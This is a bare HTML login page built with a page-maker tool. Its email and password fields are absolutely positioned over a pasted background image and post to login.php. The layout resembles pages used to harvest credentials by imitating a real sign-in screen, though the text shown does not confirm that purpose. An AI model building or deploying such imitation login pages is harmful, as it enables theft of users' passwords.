<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Login</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<form name="form1" method="post" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<div id="formimage1" style="position:absolute; left:447px; top:268px; z-index:2"><input type="image" name="formimage1" width="119" height="52" src="images/siginin.PNG"></div>
<input name="formtext1" type="text" style="position:absolute;width:275px;left:456px;top:173px;z-index:3;height: 24px;" placeholder="Email">
<input name="formtext2" type="password" style="position:absolute;width:274px;left:456px;top:201px;z-index:4;height: 24px;" placeholder="Password">
</form>

<div id="image1" style="position:absolute; overflow:hidden; left:407px; top:0px; width:389px; height:456px; z-index:1"><img src="images/paste155.jpg" alt="" title="" border=0 width=389 height=456></div>


</body>
</html>
